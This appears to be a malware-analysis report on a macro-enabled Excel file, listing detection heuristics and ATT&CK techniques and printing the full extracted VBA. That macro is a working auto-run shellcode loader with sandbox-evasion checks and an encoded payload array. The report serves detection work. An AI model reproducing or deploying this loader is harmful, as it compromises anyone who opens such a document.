Verdict: MALICIOUS
Risk Score: 176

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
- T1055.012 Process Injection: Process Hollowing
The sample is an Excel document containing VBA macros. Heuristics indicate the presence of a memory callback shellcode loader that uses VirtualAlloc, RtlMoveMemory, and CreateThread, suggesting it allocates memory, copies shellcode into it, and executes it. The GetObject call and Workbook_Open macro further indicate automated execution upon opening. This pattern is typical of macro-based malware designed to download and execute further stages.
Heuristics (6)

- VBA project inside OOXML (severity: medium; 5 related findings) [OOXML_VBA]: Document contains a VBA project (VBA macros present).
- VBA native-memory callback shellcode loader (severity: critical) [OLE_VBA_NATIVE_MEMORY_CALLBACK_LOADER]: VBA auto-exec macro declares or calls native memory allocation, process-memory write/copy, and callback/timer execution APIs. This is the in-memory shellcode loader pattern: allocate writable memory, copy decoded payload bytes into it, then transfer control through a callback such as CreateTimerQueueTimer. Benign document automation does not combine these primitives. Matched line in script: `Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr`
- GetObject call (severity: high) [OLE_VBA_GETOBJ]: GetObject call. Matched line in script: `Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")`
- VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (severity: low) [OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Workbook_Open macro (severity: low) [OLE_VBA_WBOPEN]: Workbook_Open macro. Matched line in script: `Sub Workbook_Open()`
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4892 bytes | b8316e0f39e1e5c5c095664f33ee7532afd7e7ecb46ec0a4bf081d96303d5890 |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 57856 bytes | b0d12528c94d577fb8b1e8910a3868baa460c0791bcaedffc586d257098c7e1b |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Module1"
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Function KyO()
Dim kCU As Variant
Dim Ukh As LongPtr
Dim zbG As Long
Dim HaC As Long
Dim ddx As LongPtr
If Application.RecentFiles.Count < 3 Then
Return
End If
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
For Each objItem In colItems
If objItem.NumberOfCores < 3 Then
Return
End If
Next
kCU = Array(257, 77, 136, 233, 245, 237, 209, 5, 5, 5, 70, 86, 70, 85, 87, 77, 54, 215, 106, 77, 144, 87, 101, 86, 91, 77, 144, 87, 29, 77, 144, 87, 37, 77, 144, 119, 85, 77, 20, 188, 79, 79, 82, 54, 206, 77, 54, 197, 177, 65, _
102, 129, 7, 49, 37, 70, 198, 206, 18, 70, 6, 198, 231, 242, 87, 77, 144, 87, 37, 144, 71, 65, 70, 86, 77, 6, 213, 107, 134, 125, 29, 16, 7, 20, 138, 119, 5, 5, 5, 144, 133, 141, 5, 5, 5, 77, 138, 197, 121, 108, _
77, 6, 213, 73, 144, 69, 37, 78, 6, 213, 85, 144, 77, 29, 232, 91, 77, 260, 206, 82, 54, 206, 70, 144, 57, 141, 77, 6, 219, 77, 54, 197, 70, 198, 206, 18, 177, 70, 6, 198, 61, 229, 122, 246, 81, 8, 81, 41, 13, 74, _
62, 214, 122, 221, 93, 73, 144, 69, 41, 78, 6, 213, 107, 70, 144, 17, 77, 73, 144, 69, 33, 78, 6, 213, 70, 144, 9, 141, 77, 6, 213, 70, 93, 70, 93, 99, 94, 95, 70, 93, 70, 94, 70, 95, 77, 136, 241, 37, 70, 87, _
260, 229, 93, 70, 94, 95, 77, 144, 23, 238, 80, 260, 260, 260, 98, 77, 54, 224, 88, 78, 195, 124, 110, 115, 110, 115, 106, 121, 5, 70, 91, 77, 142, 230, 78, 204, 199, 81, 124, 43, 12, 260, 218, 88, 88, 77, 142, 230, 88, 95, _
82, 54, 197, 82, 54, 206, 88, 88, 78, 191, 63, 91, 126, 172, 5, 5, 5, 5, 260, 218, 237, 19, 5, 5, 5, 54, 62, 55, 51, 54, 59, 61, 51, 57, 62, 51, 59, 62, 5, 95, 77, 142, 198, 78, 204, 197, 192, 6, 5, 5, _
82, 54, 206, 88, 88, 111, 8, 88, 78, 191, 92, 142, 164, 203, 5, 5, 5, 5, 260, 218, 237, 125, 5, 5, 5, 52, 55, 127, 91, 90, 55, 72, 120, 91, 60, 103, 108, 127, 60, 89, 81, 123, 90, 124, 57, 85, 94, 124, 102, 53, _
111, 72, 102, 125, 116, 87, 120, 110, 70, 95, 71, 71, 112, 77, 108, 78, 119, 62, 122, 124, 93, 88, 114, 112, 115, 57, 76, 84, 75, 85, 120, 103, 71, 102, 87, 110, 113, 57, 71, 84, 121, 73, 90, 74, 77, 83, 118, 124, 105, 79, _
112, 116, 56, 125, 127, 109, 121, 107, 71, 77, 77, 104, 77, 87, 118, 108, 93, 92, 89, 100, 60, 76, 74, 115, 70, 92, 125, 76, 60, 111, 75, 118, 122, 81, 77, 127, 82, 127, 110, 113, 104, 109, 126, 88, 5, 77, 142, 198, 88, 95, _
70, 93, 82, 54, 206, 88, 77, 189, 5, 55, 173, 137, 5, 5, 5, 5, 85, 88, 88, 78, 204, 199, 240, 90, 51, 64, 260, 218, 77, 142, 203, 111, 15, 100, 77, 142, 246, 111, 36, 95, 87, 109, 133, 56, 5, 5, 78, 142, 229, 111, _
9, 70, 94, 78, 191, 122, 75, 163, 139, 5, 5, 5, 5, 260, 218, 82, 54, 197, 88, 95, 77, 142, 246, 82, 54, 206, 82, 54, 206, 88, 88, 78, 204, 199, 50, 11, 29, 128, 260, 218, 138, 197, 122, 36, 77, 204, 198, 141, 24, 5, _
5, 78, 191, 73, 245, 58, 229, 5, 5, 5, 5, 260, 218, 77, 260, 212, 121, 7, 240, 175, 237, 90, 5, 5, 5, 88, 94, 111, 69, 95, 78, 142, 214, 198, 231, 21, 78, 204, 197, 5, 21, 5, 5, 78, 191, 93, 169, 88, 234, 5, _
5, 5, 5, 260, 218, 77, 152, 88, 88, 77, 142, 236, 77, 142, 246, 77, 142, 223, 78, 204, 197, 5, 37, 5, 5, 78, 142, 254, 78, 191, 23, 155, 142, 231, 5, 5, 5, 5, 260, 218, 77, 136, 201, 37, 138, 197, 121, 183, 107, 144, _
12, 77, 6, 200, 138, 197, 122, 215, 93, 200, 93, 111, 5, 94, 78, 204, 199, 245, 186, 167, 91, 260, 218)
For i = 0 To UBound(kCU)
kCU(i) = kCU(i) - 5
Next i
Ukh = VirtualAlloc(0, UBound(kCU), &H3000, &H40)
For zbG = LBound(kCU) To UBound(kCU)
HaC = kCU(zbG)
ddx = RtlMoveMemory(Ukh + zbG, HaC, 1)
Next zbG
res = CreateThread(0, 0, Ukh, 0, 0, 0)
End Function
Sub Workbook_Open()
KyO
End Sub
Sub AutoOpen()
KyO
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```